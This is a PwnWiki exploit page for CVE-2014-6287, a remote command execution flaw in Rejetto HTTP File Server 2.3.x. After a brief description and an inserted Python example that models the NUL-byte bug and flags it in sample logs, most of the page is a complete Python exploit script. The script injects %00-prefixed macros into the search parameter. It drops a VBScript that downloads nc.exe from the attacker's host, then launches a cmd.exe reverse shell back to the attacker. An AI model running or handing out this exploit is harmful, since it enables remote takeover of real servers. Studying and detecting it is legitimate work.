CVE-2014-6287 Rejetto HTTP File Server arbitrary program execution vulnerability

From PwnWiki

INFO

The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (aka HFS or HttpFileServer) 2.3x before 2.3c allows remote attackers to execute arbitrary programs via a %00 sequence in a search action.
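The bug class behind this CVE is a NUL-terminated scan: the check for macro markers stops at the first %00 byte, while the rest of the request (which still contains the "{." marker) is processed afterwards. The following added example is not from PwnWiki or from Rejetto; it models that failure mode in Python (the vulnerable function is a simplified assumption about the bug class, not HFS's Pascal code) next to a hardened check that rejects embedded NULs and inspects the whole value, and runs a detection rule over constructed access-log lines to flag requests of this shape.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not captured traffic); the request
# line shape mimics a common web-server access log.
SAMPLE_LOG = [
    '10.0.0.5 - - [04/Jan/2016:10:00:01 +0000] "GET /?search=report.pdf HTTP/1.1" 200 512',
    '10.0.0.7 - - [04/Jan/2016:10:00:02 +0000] "GET /?search=%00{.exec|EXAMPLE.exe.} HTTP/1.1" 200 0',
    '10.0.0.9 - - [04/Jan/2016:10:00:03 +0000] "GET /?search=%7B.notes%7D HTTP/1.1" 200 128',
]

# HFS macro markers open with "{." or "{:" (the request on this page uses "{.").
MACRO_OPEN = re.compile(r"\{[.:]")


def find_macro_marker_null_terminated(value: str) -> bool:
    """Model of the vulnerable scan (an assumption about the bug class, not
    HFS's Pascal code): the value is treated as NUL-terminated, so nothing
    after the first "\\x00" is inspected and a marker placed there is missed."""
    visible = value.split("\x00", 1)[0]
    return MACRO_OPEN.search(visible) is not None


def find_macro_marker_full(value: str) -> bool:
    """Hardened scan: an embedded NUL has no legitimate place in a search term,
    so it is rejected outright, and the entire value is inspected for markers."""
    if "\x00" in value:
        return True
    return MACRO_OPEN.search(value) is not None


def extract_search_param(log_line: str):
    """Pull the decoded ?search= value out of a logged request line, or None."""
    m = re.search(r'"(?:GET|POST) (\S+) HTTP/', log_line)
    if not m:
        return None
    params = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    values = params.get("search")
    return values[0] if values else None


def classify_search(value):
    """Return 'clean', 'macro-marker' or 'nul-bypass' for a decoded search value.
    'nul-bypass' is the CVE-2014-6287 shape: a marker the NUL-terminated scan
    misses but the full scan catches."""
    if value is None:
        return "clean"
    full = find_macro_marker_full(value)
    truncated = find_macro_marker_null_terminated(value)
    if full and not truncated:
        return "nul-bypass"
    if full:
        return "macro-marker"
    return "clean"


def scan_log(lines):
    """Return (client_ip, classification) for every line that is not clean."""
    findings = []
    for line in lines:
        verdict = classify_search(extract_search_param(line))
        if verdict != "clean":
            findings.append((line.split()[0], verdict))
    return findings


if __name__ == "__main__":
    for ip, verdict in scan_log(SAMPLE_LOG):
        print(f"{ip}: {verdict}")
```

The detection deliberately decodes the query string before matching, so percent-encoded variants of the marker (as in the third sample line) are classified as well; a rule that only greps the raw log for the literal string "%00{." would miss them.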


EXP


# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 04-01-2016
# Remote: Yes
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
# Description: You can use HFS (HTTP File Server) to send and receive files.
#     It's different from classic file sharing because it uses web technology to be more
#     compatible with today's Internet. It also differs from classic web servers because
#     it's very easy to use and runs "right out-of-the box". Access your remote files, over
#     the network. It has been successfully tested with Wine under Linux.

# Usage is: python %s <Target IP address> <Target Port Number> <Local ip where http server listen> <local port for the reverse shell>
# EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).
# You may need to run it multiple times for success!

import urllib2 as url
import sys

if len(sys.argv) == 5:
  rhost = sys.argv[1]
  rport = sys.argv[2]
  lhost = sys.argv[3]  # local IP address
  lport = sys.argv[4]  # Local Port number
else:
  print "[-] Something went wrong..!"
  print "[-] Usage is: python %s <Target IP address> <Target Port Number> <Local ip where http server listen> <local port for the reverse shell>" % sys.argv[0]
  print "[-] Don't forget to have an http server which will serve the nc.exe file like http://local_ip:80/nc.exe"
  sys.exit(-1)
vbscript="C:\\Users\\Public\\script.vbs"
ncdownurl="http://"+lhost+"/nc.exe"
ncpathsave="C:\\Users\\Public\\nc.exe"
exe1 = "exec|" + "cscript.exe "+vbscript
exe2 = "exec|" + ncpathsave+" -e cmd.exe " +lhost + " " + lport

save='''save|'''+vbscript+'''|dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "'''+ncdownurl+'''", False
xHttp.Send

with bStrm
    .type = 1 '//binary
    .open
    .write xHttp.responseBody
    .savetofile "'''+ncpathsave+'''", 2 '//overwrite
end with
'''

try:
  # create vbs wget nc.exe
  url.urlopen("http://" + rhost + ":" + rport + "/?search=%00{.+" + url.quote(save) + ".}")

  #execute_script
  url.urlopen("http://" + rhost + ":" + rport + "/?search=%00{.+" + url.quote(exe1) + ".}")

  #nc_run():
  url.urlopen("http://" + rhost + ":" + rport + "/?search=%00{.+" + url.quote(exe2) + ".}")
except:
  print "[-] Something went wrong..!"
  print "[-] Usage is: python %s <Target IP address> <Target Port Number> <Local ip where http server listen> <local port for the reverse shell>" % sys.argv[0]
  print "[-] Don't forget to have an http server which will serve the nc.exe file like http://local_ip:80/nc.exe"
  sys.exit(-1)